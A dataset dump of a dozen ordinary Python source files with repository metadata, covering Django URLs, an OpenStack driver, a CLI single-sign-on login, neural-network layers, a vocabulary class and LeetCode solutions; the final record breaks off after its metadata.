Column schema (ranges are observed min–max):

| column | dtype | range / classes |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–288 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64, nullable | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us], nullable | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us], nullable | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |

Records follow, one per source file:

---

blob_id: 97d15d6f45852f8ad8f5576eff06fea5cb1089b3 | directory_id: 43cbef9a8b7424fb7144255d1d9494be828e3b4c | content_id: a6c54bd79ab683e6b46d4559d9fdcb440476523a
path: /nes_randomizer/registration/urls.py | extension: py | length_bytes: 147
repo_name: thebmo/NESRandomizer | branch_name: refs/heads/master | snapshot_id: 59135814c3dd23d948af1f5ce7ca236c8f96dc56 | revision_id: 1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f
detected_licenses: [] | license_type: no_license
visit_date: 2020-07-05T08:19:02.916233 | revision_date: 2015-11-03T03:34:32 | committer_date: 2015-11-03T03:34:32
github_id: 22,393,483 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.register, name='register'),
)
authors: ["[email protected]"]

---

blob_id: 46605773042e4694045207282c63666f3ac7d88a | directory_id: b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | content_id: 9717ba421b4a63ea98d5328cfd53bec9b7f01766
path: /network/security_group/openstack_driver.py | extension: py | length_bytes: 1,631
repo_name: bopopescu/nova-24 | branch_name: refs/heads/master | snapshot_id: 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | revision_id: 3247a7199932abf9718fb3260db23e9e40013731
detected_licenses: [] | license_type: no_license
visit_date: 2022-11-20T00:48:53.224075 | revision_date: 2016-12-22T09:09:57 | committer_date: 2016-12-22T09:09:57
github_id: 282,140,423 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2020-07-24T06:24:14 | gha_created_at: 2020-07-24T06:24:13 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
security_group_opts = [
cfg.StrOpt('security_group_api',
default='nova',
help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
if CONF.security_group_api.lower() == 'nova':
return importutils.import_object(NOVA_DRIVER)
elif CONF.security_group_api.lower() in ('neutron', 'quantum'):
return importutils.import_object(NEUTRON_DRIVER)
else:
return importutils.import_object(CONF.security_group_api)
def is_neutron_security_groups():
return CONF.security_group_api.lower() in ('neutron', 'quantum')
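# Usage sketch (illustrative setting, assuming oslo config is loaded): with
# CONF.security_group_api = 'neutron', get_openstack_security_group_driver()
# imports and instantiates NEUTRON_DRIVER, and is_neutron_security_groups()
# returns True; any other value is treated as a full class path to import.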
authors: ["[email protected]"]

---

blob_id: 0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb | directory_id: edc80b253c0ad88a421f7cd341d695e601fde73d | content_id: 1194f99c9f18970a5625febf931cca1ec72e84ff
path: /utils.py | extension: py | length_bytes: 1,607
repo_name: prashantramangupta/snet-platform-usage | branch_name: refs/heads/master | snapshot_id: 62cc4061326e89ca39c1b3105362fc4b4fb9509c | revision_id: 41b0669ebebf116012f312a333d0b3cbcdcf8519
detected_licenses: ["MIT"] | license_type: permissive
visit_date: 2022-11-04T23:57:35.611828 | revision_date: 2022-10-13T05:03:05 | committer_date: 2022-10-13T05:03:05
github_id: 177,531,350 | star_events_count: 1 | fork_events_count: 1
gha_license_id: MIT | gha_event_created_at: 2022-10-12T10:20:37 | gha_created_at: 2019-03-25T06:56:31 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url
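# Usage sketch (assumes SLACK_HOOK is configured in the constant module):
# Utils().report_slack(0, "daily sync done") posts the text
# "info:: daily sync done" to the #contract-index-alerts channel.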
authors: ["[email protected]"]

---

blob_id: 50d7896ca2a3fd81c7a3a5b423c105fc094df359 | directory_id: 0f2112a0e198cb0275c002826854c836bbfb5bdf | content_id: ebc8b9794d95d617edc05784841fc62efa089799
path: /pywicta/image/__init__.py | extension: py | length_bytes: 158
repo_name: jeremiedecock/pywi-cta | branch_name: refs/heads/master | snapshot_id: a7f98ae59beb1adecb25623153c13e5bc70e5560 | revision_id: 1185f7dfa48d60116472c12ffc423be78a250fc9
detected_licenses: ["MIT"] | license_type: permissive
visit_date: 2021-04-15T12:06:03.723786 | revision_date: 2019-03-21T02:33:15 | committer_date: 2019-03-21T02:33:15
github_id: 126,397,380 | star_events_count: 0 | fork_events_count: 1
gha_license_id: MIT | gha_event_created_at: 2018-10-16T12:17:52 | gha_created_at: 2018-03-22T21:31:45 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
"""Image functions
This package contains additional image processing functions.
"""
from . import hillas_parameters
from . import signal_to_border_distance
authors: ["[email protected]"]

---

blob_id: 936ac1a26cc0f0c3c4098e4dab5068c152183601 | directory_id: 786de89be635eb21295070a6a3452f3a7fe6712c | content_id: 79a8398cab91d01f66746f757727ba8c866b37e9
path: /root/tags/V00-03-00/SConscript | length_bytes: 1,056
repo_name: connectthefuture/psdmrepo | branch_name: refs/heads/master | snapshot_id: 85267cfe8d54564f99e17035efe931077c8f7a37 | revision_id: f32870a987a7493e7bf0f0a5c1712a5a030ef199
detected_licenses: [] | license_type: no_license
visit_date: 2021-01-13T03:26:35.494026 | revision_date: 2015-09-03T22:22:11 | committer_date: 2015-09-03T22:22:11
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package root
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
#
# For the standard external packages which contain includes, libraries,
# and applications it is usually sufficient to call standardExternalPackage()
# giving some or all parameters.
#
root_ver = "5.34.25"
PREFIX = pjoin('$SIT_EXTERNAL_SW', "root", root_ver + "-$PYTHON")
INCDIR = "include/root"
LIBDIR = "lib"
LINKLIBS = "lib*.so*"
PKGLIBS = "Core Cint RIO Net Hist Graf Graf3d Gpad Tree Rint Postscript Matrix Physics MathCore Thread m dl"
BINDIR = "bin"
LINKBINS = "root root.exe rootcint root-config"
PYDIR = "lib"
LINKPY = "*.py libPyROOT.so*"
standardExternalPackage('root', **locals())
authors: ["[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"]
author_id: [email protected]@b967ad99-d558-0410-b138-e0f6c56caec7

---

blob_id: 47aedceb25e986a3e5d3aae64be46cd960624d18 | directory_id: 81f128c1d3ffc57ea35053a0f42bc3adb8ac820d | content_id: 71e3cfa1b711929ae1f857f0ba8333e70073b35b
path: /MxShop/db_tools/import_goods_data.py | extension: py | length_bytes: 2,099
repo_name: tminlun/tminlun-MxShop | branch_name: refs/heads/master | snapshot_id: f06816b5f596cffb7fa634891a70567055de1bf9 | revision_id: a1ccf4b05edd8b47ad716fe65072b5be6e501e50
detected_licenses: [] | license_type: no_license
visit_date: 2022-12-10T11:08:28.043339 | revision_date: 2019-04-15T15:12:44 | committer_date: 2019-04-15T15:12:44
github_id: 176,200,320 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2022-12-08T01:43:02 | gha_created_at: 2019-03-18T03:47:29 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# _*_ encoding:utf-8 _*_
__author__ = '田敏伦'
__date__ = '2019/2/27 0027 20:38'
# import the goods data
import sys
import os
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(pwd + "../")
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MxShop.settings')
import django
django.setup()
from db_tools.data.product_data import row_data
from goods.models import Goods,GoodsCategory,GoodsImage
for goods_detail in row_data:
goods = Goods()
goods.name = goods_detail["name"]
    # replace("¥", "").replace("元", "") strips the currency sign and the unit
goods.market_price = float(int(goods_detail["market_price"].replace("¥", "").replace("元", "")))
goods.shop_price = float(int(goods_detail["sale_price"].replace("¥", "").replace("元", "")))
    # If desc is not None, pass it to goods_brief; otherwise convert None to "" first
goods.goods_brief = goods_detail["desc"] if goods_detail["desc"] is not None else ""
goods.goods_desc = goods_detail["goods_desc"] if goods_detail["goods_desc"] is not None else ""
    # Use the first image as the cover (pass "" if there are no images; the image column defaults to str in the database)
goods.goods_front_image = goods_detail["images"][0] if goods_detail["images"] else ""
    # Use the third-level category as the product's category
category_name = goods_detail["categorys"][-1]
    # Use filter rather than get: filter returns an empty queryset instead of raising
    # when nothing matches (goods.category must be given the model instance, not a str)
category = GoodsCategory.objects.filter(name=category_name)
    if category:
        print(category[0])  # category is a queryset; category[0] is the first matched instance
        goods.category = category[0]  # the category of the current product
goods.save()
    # the product's images
for good_image in goods_detail["images"]:
goods_image_instance = GoodsImage()
goods_image_instance.image = good_image
            goods_image_instance.goods = goods  # goods is the instance created in the outer loop
goods_image_instance.save()
authors: ["[email protected]"]

---

blob_id: 150031906408644576efe4932f757a1e0abf4fa8 | directory_id: ddddaa700e4642f46a2c1e1e0271a7c8ea62ba0f | content_id: 026b6b502e98d88856d356e481ab9bf2cf8167e6
path: /harness/determined/cli/sso.py | extension: py | length_bytes: 5,240
repo_name: determined-ai/determined | branch_name: refs/heads/main | snapshot_id: 9d563cb5ffd074c88ee5edc9bf22ab9c3cb78c7e | revision_id: 8239b1993f4f44390f4e88901ffaf3b12429b83c
detected_licenses: ["Apache-2.0"] | license_type: permissive
visit_date: 2023-08-21T12:13:36.651298 | revision_date: 2023-08-21T08:34:16 | committer_date: 2023-08-21T08:34:16
github_id: 253,846,879 | star_events_count: 2,531 | fork_events_count: 330
gha_license_id: Apache-2.0 | gha_event_created_at: 2023-09-14T21:54:17 | gha_created_at: 2020-04-07T16:12:29 | gha_language: Go
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import sys
import webbrowser
from argparse import Namespace
from getpass import getpass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Callable, List
from urllib.parse import parse_qs, urlparse
from determined.common import api
from determined.common.api import authentication
from determined.common.declarative_argparse import Arg, Cmd
from determined.errors import EnterpriseOnlyError
CLI_REDIRECT_PORT = 49176
def handle_token(master_url: str, token: str) -> None:
tmp_auth = {"Cookie": "auth={token}".format(token=token)}
me = api.get(master_url, "/users/me", headers=tmp_auth, authenticated=False).json()
token_store = authentication.TokenStore(master_url)
token_store.set_token(me["username"], token)
token_store.set_active(me["username"])
print("Authenticated as {}.".format(me["username"]))
def make_handler(master_url: str, close_cb: Callable[[int], None]) -> Any:
class TokenAcceptHandler(BaseHTTPRequestHandler):
def do_GET(self) -> None:
try:
"""Serve a GET request."""
token = parse_qs(urlparse(self.path).query)["token"][0]
handle_token(master_url, token)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"You can close this window now.")
close_cb(0)
except Exception as e:
print("Error authenticating: {}.".format(e))
close_cb(1)
def log_message(self, format: Any, *args: List[Any]) -> None: # noqa: A002
# Silence server logging.
return
return TokenAcceptHandler
def sso(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if not sso_providers:
print("No SSO providers found.")
return
elif not parsed_args.provider:
if len(sso_providers) > 1:
print("Provider must be specified when multiple are available.")
return
matched_provider = sso_providers[0]
else:
matching_providers = [
p for p in sso_providers if p["name"].lower() == parsed_args.provider.lower()
]
if not matching_providers:
ps = ", ".join(p["name"].lower() for p in sso_providers)
print("Provider {} unsupported. (Providers found: {})".format(parsed_args.provider, ps))
return
elif len(matching_providers) > 1:
print("Multiple SSO providers found with name {}.".format(parsed_args.provider))
return
matched_provider = matching_providers[0]
sso_url = matched_provider["sso_url"] + "?relayState=cli"
if not parsed_args.headless:
if webbrowser.open(sso_url):
print(
"Your browser should open and prompt you to sign on;"
" if it did not, please visit {}".format(sso_url)
)
print("Killing this process before signing on will cancel authentication.")
with HTTPServer(
("localhost", CLI_REDIRECT_PORT),
make_handler(parsed_args.master, lambda code: sys.exit(code)),
) as httpd:
return httpd.serve_forever()
print("Failed to open Web Browser. Falling back to --headless CLI mode.")
example_url = f"Example: 'http://localhost:{CLI_REDIRECT_PORT}/?token=v2.public.[long_str]'"
print(
f"Please open this URL in your browser: '{sso_url}'\n"
"After authenticating, copy/paste the localhost URL "
f"from your browser into the prompt.\n{example_url}"
)
token = None
while not token:
user_input_url = getpass(prompt="\n(hidden) localhost URL? ")
try:
token = parse_qs(urlparse(user_input_url).query)["token"][0]
handle_token(parsed_args.master, token)
except (KeyError, IndexError):
print(f"Could not extract token from localhost URL. {example_url}")
def list_providers(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if len(sso_providers) == 0:
print("No SSO providers found.")
return
print("Available providers: " + ", ".join(provider["name"] for provider in sso_providers) + ".")
# fmt: off
args_description = [
Cmd("auth", None, "manage auth", [
Cmd("login", sso, "sign on with an auth provider", [
Arg("-p", "--provider", type=str,
help="auth provider to use (not needed if the Determined master only supports"
" one provider)"),
Arg("--headless", action="store_true", help="force headless cli auth")
]),
Cmd("list-providers", list_providers, "lists the available auth providers", []),
])
] # type: List[Any]
# fmt: on
authors: ["[email protected]"]

---

blob_id: 01f149a939d7ee4687c0ce58037ed05278e16865 | directory_id: 04142fdda9b3fb29fb7456d5bc3e504985f24cbe | content_id: 78fb5bf371712d13a72edf5d57151dca8fce6953
path: /mmcv/cnn/bricks/upsample.py | extension: py | length_bytes: 3,299
repo_name: open-mmlab/mmcv | branch_name: refs/heads/main | snapshot_id: 419e301bbc1d7d45331d67eccfd673f290a796d5 | revision_id: 6e9ee26718b22961d5c34caca4108413b1b7b3af
detected_licenses: ["Apache-2.0"] | license_type: permissive
visit_date: 2023-08-31T07:08:27.223321 | revision_date: 2023-08-28T09:02:10 | committer_date: 2023-08-28T09:02:10
github_id: 145,670,155 | star_events_count: 5,319 | fork_events_count: 1,900
gha_license_id: Apache-2.0 | gha_event_created_at: 2023-09-14T02:37:16 | gha_created_at: 2018-08-22T07:05:26 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmengine.model import xavier_init
from mmengine.registry import MODELS
MODELS.register_module('nearest', module=nn.Upsample)
MODELS.register_module('bilinear', module=nn.Upsample)
@MODELS.register_module(name='pixel_shuffle')
class PixelShufflePack(nn.Module):
"""Pixel Shuffle upsample layer.
This module packs `F.pixel_shuffle()` and a nn.Conv2d module together to
achieve a simple upsampling with pixel shuffle.
Args:
in_channels (int): Number of input channels.
out_channels (int): Number of output channels.
scale_factor (int): Upsample ratio.
upsample_kernel (int): Kernel size of the conv layer to expand the
channels.
"""
def __init__(self, in_channels: int, out_channels: int, scale_factor: int,
upsample_kernel: int):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.scale_factor = scale_factor
self.upsample_kernel = upsample_kernel
self.upsample_conv = nn.Conv2d(
self.in_channels,
self.out_channels * scale_factor * scale_factor,
self.upsample_kernel,
padding=(self.upsample_kernel - 1) // 2)
self.init_weights()
def init_weights(self):
xavier_init(self.upsample_conv, distribution='uniform')
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.upsample_conv(x)
x = F.pixel_shuffle(x, self.scale_factor)
return x
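# Shape sketch with illustrative values (not taken from this file): with
# in_channels=64, out_channels=64, scale_factor=2, upsample_kernel=3, the
# conv maps (N, 64, H, W) -> (N, 256, H, W), and F.pixel_shuffle regroups
# the 256 channels into (N, 64, 2H, 2W).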
def build_upsample_layer(cfg: Dict, *args, **kwargs) -> nn.Module:
"""Build upsample layer.
Args:
cfg (dict): The upsample layer config, which should contain:
- type (str): Layer type.
- scale_factor (int): Upsample ratio, which is not applicable to
deconv.
            - layer args: Args needed to instantiate an upsample layer.
args (argument list): Arguments passed to the ``__init__``
method of the corresponding conv layer.
kwargs (keyword arguments): Keyword arguments passed to the
``__init__`` method of the corresponding conv layer.
Returns:
nn.Module: Created upsample layer.
"""
if not isinstance(cfg, dict):
raise TypeError(f'cfg must be a dict, but got {type(cfg)}')
if 'type' not in cfg:
raise KeyError(
f'the cfg dict must contain the key "type", but got {cfg}')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if inspect.isclass(layer_type):
upsample = layer_type
# Switch registry to the target scope. If `upsample` cannot be found
# in the registry, fallback to search `upsample` in the
# mmengine.MODELS.
else:
with MODELS.switch_scope_and_registry(None) as registry:
upsample = registry.get(layer_type)
if upsample is None:
            raise KeyError(f'Cannot find {layer_type} in registry under scope '
                f'name {registry.scope}')
if upsample is nn.Upsample:
cfg_['mode'] = layer_type
layer = upsample(*args, **kwargs, **cfg_)
return layer
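# Usage sketch (illustrative cfg): build_upsample_layer(dict(type='bilinear',
# scale_factor=2)) resolves 'bilinear' to the nn.Upsample registered above,
# fills in cfg_['mode'] = 'bilinear', and so returns
# nn.Upsample(scale_factor=2, mode='bilinear').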
authors: ["[email protected]"]

---

blob_id: 697a14ba16fec12bc6822c838c5c9307b462870a | directory_id: 4d7f743f871860e64f7e1e057b32c8af76fe98ff | content_id: 893b2a2fcfcb1d9146383a199150e541bf465ee5
path: /nmtlab/utils/vocab.py | extension: py | length_bytes: 3,111
repo_name: MarkWuNLP/nmtlab | branch_name: refs/heads/master | snapshot_id: 8a822c7d2385f885509b9b3e5d039b8fc38562ad | revision_id: da9c28126336528fc6b85f2d424632ad227a3682
detected_licenses: ["MIT"] | license_type: permissive
visit_date: 2022-02-21T14:05:10.523962 | revision_date: 2019-10-05T08:32:21 | committer_date: 2019-10-05T08:32:21
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torchtext.vocab
import pickle
from collections import Counter, defaultdict
DEFAULT_SPECIAL_TOKENS = ["<null>", "<s>", "</s>", "UNK"]
class Vocab(torchtext.vocab.Vocab):
def __init__(self, path=None, unk_token="UNK", picklable=False):
self._unk_token = unk_token
self.itos = []
if picklable:
self.stoi = {}
else:
self.stoi = defaultdict(lambda: 3)
if path:
self.load(path)
def size(self):
return len(self.itos)
def initialize(self, special_tokens=None):
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
self.itos = special_tokens
self._build_vocab_map()
def build(self, txt_path, limit=None, special_tokens=None, char_level=False, field=None, delim="\t"):
vocab_counter = Counter()
for line in open(txt_path):
line = line.strip()
if field is not None:
line = line.split(delim)[field]
if char_level:
words = [w.encode("utf-8") for w in line.decode("utf-8")]
else:
words = line.split(" ")
vocab_counter.update(words)
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
if limit is not None:
final_items = vocab_counter.most_common()[:limit - len(special_tokens)]
else:
final_items = vocab_counter.most_common()
final_items.sort(key=lambda x: (-x[1], x[0]))
final_words = [x[0] for x in final_items]
self.itos = special_tokens + final_words
self._build_vocab_map()
def set_vocab(self, unique_tokens, special_tokens=True):
if special_tokens:
self.itos = DEFAULT_SPECIAL_TOKENS + unique_tokens
else:
self.itos = unique_tokens
self._build_vocab_map()
def add(self, token):
if token not in self.stoi:
self.itos.append(token)
self.stoi[token] = self.itos.index(token)
def save(self, path):
pickle.dump(self.itos, open(path, "wb"))
def load(self, path):
with open(path, "rb") as f:
self.itos = pickle.load(f, encoding='utf-8')
self._build_vocab_map()
def _build_vocab_map(self):
self.stoi.update({tok: i for i, tok in enumerate(self.itos)})
def encode(self, tokens):
return list(map(self.encode_token, tokens))
def encode_token(self, token):
if token in self.stoi:
return self.stoi[token]
else:
return self.stoi[self._unk_token]
def decode(self, indexes):
return list(map(self.decode_token, indexes))
def decode_token(self, index):
return self.itos[index] if index < len(self.itos) else self._unk_token
def contains(self, token):
return token in self.stoi
def get_list(self):
return self.itos
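# Usage sketch (hypothetical corpus path "train.txt"):
# v = Vocab()
# v.build("train.txt", limit=30000)          # itos = special tokens + most frequent words
# ids = v.encode("hello world".split(" "))   # unseen tokens fall back to UNK (index 3)
# tokens = v.decode(ids)                     # out-of-range indexes decode to the UNK token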
authors: ["[email protected]"]

---

blob_id: 0ff47b51128d4c3f179c4ff101481282d1461151 | directory_id: 47fabc7be3769cb1d2d17369efe2048818158477 | content_id: fb9f8105646ef967184adf4470dbd210056f4169
path: /test/test_multinomial_splitting.py | extension: py | length_bytes: 1,223
repo_name: jpeyhardi/GLM | branch_name: refs/heads/master | snapshot_id: 35ae651c4aa9771fec63b7c151858e0555a80c07 | revision_id: 6f0fd763aec2a0ccdef3901b71ed990f20119510
detected_licenses: ["Apache-2.0"] | license_type: permissive
visit_date: 2021-09-26T08:50:08.938073 | revision_date: 2018-10-28T13:22:24 | committer_date: 2018-10-28T13:22:24
github_id: 125,999,551 | star_events_count: 0 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2018-03-20T10:21:13 | gha_created_at: 2018-03-20T10:21:09 | gha_language: C++
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from statiskit import (linalg,
core,
glm)
from statiskit.data import glm as data
import unittest
from nose.plugins.attrib import attr
import math
@attr(linux=True,
osx=True,
win=True,
level=0)
class TestMultinomialSplittingRegression(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Test Multinomial splitting regression construction"""
cls._data = data.load('KN03')
# def test_Fisher_estimation(self):
# """Test negative binomial regression Fisher estimation"""
# data = self._data.extract(explanatories=range(len(self._data.components) - 1),
# response=-1)
# fe = glm.negative_binomial_estimation(algo='Fisher',
# data=data,
# kappa=1.274892646)
# self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.15, places=2)
# # self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.61, places=2)
@classmethod
def tearDownClass(cls):
"""Test Negative Binomial regression deletion"""
del cls._data
authors: ["[email protected]"]

---

blob_id: 26abe393261a86288211f6bc9fd241563a9b60ce | directory_id: 119a85a388fe436361530fbb47932e704d749557 | content_id: dbd8a3fbf7c6e8f609c9564bba8de27bd211ea3d
path: /PEAK-0.5a4dev_r2085/build/lib.macosx-10.6-x86_64-2.7/peak/util/signature.py | extension: py | length_bytes: 1,270
repo_name: chrisrgunn/cs156project | branch_name: refs/heads/master | snapshot_id: 014d5b05c6bf0e08ab8bd0dea525057d0e65b9a7 | revision_id: e5414a37f9793c8b0674695b948482b559b18ea6
detected_licenses: ["Python-2.0"] | license_type: permissive
visit_date: 2021-01-19T14:09:49.046539 | revision_date: 2017-05-24T02:10:29 | committer_date: 2017-05-24T02:10:29
github_id: 88,128,762 | star_events_count: 0 | fork_events_count: 2
gha_license_id: null | gha_event_created_at: 2017-05-04T23:49:09 | gha_created_at: 2017-04-13T05:36:10 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
"""Crude introspection of call signatures"""
import protocols; from protocols import adapt, Interface
from inspect import getargspec
from types import FunctionType, MethodType
__all__ = 'ISignature', 'getPositionalArgs'
class ISignature(Interface):
# XXX There should be a lot more here than this...
def getPositionalArgs():
"""Return a sequence of positional argument names"""
def getCallable():
"""Return the callable object"""
class FunctionAsSignature(protocols.Adapter):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[FunctionType]
)
def getPositionalArgs(self):
return getargspec(self.subject)[0]
def getCallable(self):
return self.subject
class MethodAsSignature(FunctionAsSignature):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[MethodType]
)
def __init__(self, ob):
self.funcSig = adapt(ob.im_func, ISignature)
self.offset = ob.im_self is not None
self.subject = ob
def getPositionalArgs(self):
return self.funcSig.getPositionalArgs()[self.offset:]
def getPositionalArgs(ob):
return adapt(ob,ISignature).getPositionalArgs()
authors: ["[email protected]"]

---

blob_id: 4cf2a8b84c3cdd0ebae529ac5397255b44f2e9ee | directory_id: 5f2103b1083b088aed3f3be145d01a770465c762 | content_id: 54dbb0fb8a1dbe5530f49b27d210c81d690d7a0e
path: /406. Queue Reconstruction by Height.py | extension: py | length_bytes: 1,520
repo_name: supersj/LeetCode | branch_name: refs/heads/master | snapshot_id: 5605c9bcb5ddcaa83625de2ad9e06c3485220019 | revision_id: 690adf05774a1c500d6c9160223dab7bcc38ccc1
detected_licenses: [] | license_type: no_license
visit_date: 2021-01-17T17:23:39.585738 | revision_date: 2017-02-27T15:08:42 | committer_date: 2017-02-27T15:08:42
github_id: 65,526,089 | star_events_count: 2 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from operator import itemgetter
# todo insert order thinking
class Solution1(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = itemgetter(1,0))
result = []
start = 0
for ele in people:
if ele[1] == 0:
result.append(ele)
start += 1
else:
break
_last = start
_lastlevel = 0
for i in range(start,len(people)):
cnt = people[i][1]
if cnt != _lastlevel:
_last = 0
_lastlevel = cnt
_index = 0
for num in result:
if cnt == 0:
break
if num[0] >= people[i][0]:
cnt -= 1
_index += 1
_last = max(_last+1,_index)
result.insert(_last,people[i])
return result
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = lambda x: x[1])
people.sort(key = lambda x: x[0],reverse= True)
result = []
print(people)
for ele in people:
result.insert(ele[1],ele)
return result
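# Why the second solution works: the two stable sorts order people tallest first
# (equal heights by ascending k), and inserting each person at index k leaves
# exactly k taller-or-equal people in front of them, as the problem requires.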
p = [[8,2],[4,2],[4,5],[2,0],[7,2],[1,4],[9,1],[3,1],[9,0],[1,0]]
hh = Solution()
hh.reconstructQueue(p)
authors: ["[email protected]"]

---

blob_id: 1f330a243eabf5b8c046f3eeffcee642a856d548 | directory_id: 0937646b6ce9249a8d193987f308ce398dc28bd1 | content_id: 5ec24357b53855d4c9189223fbb28b268e8829ff
path: /104API/104API.py | extension: py | length_bytes: 1,863
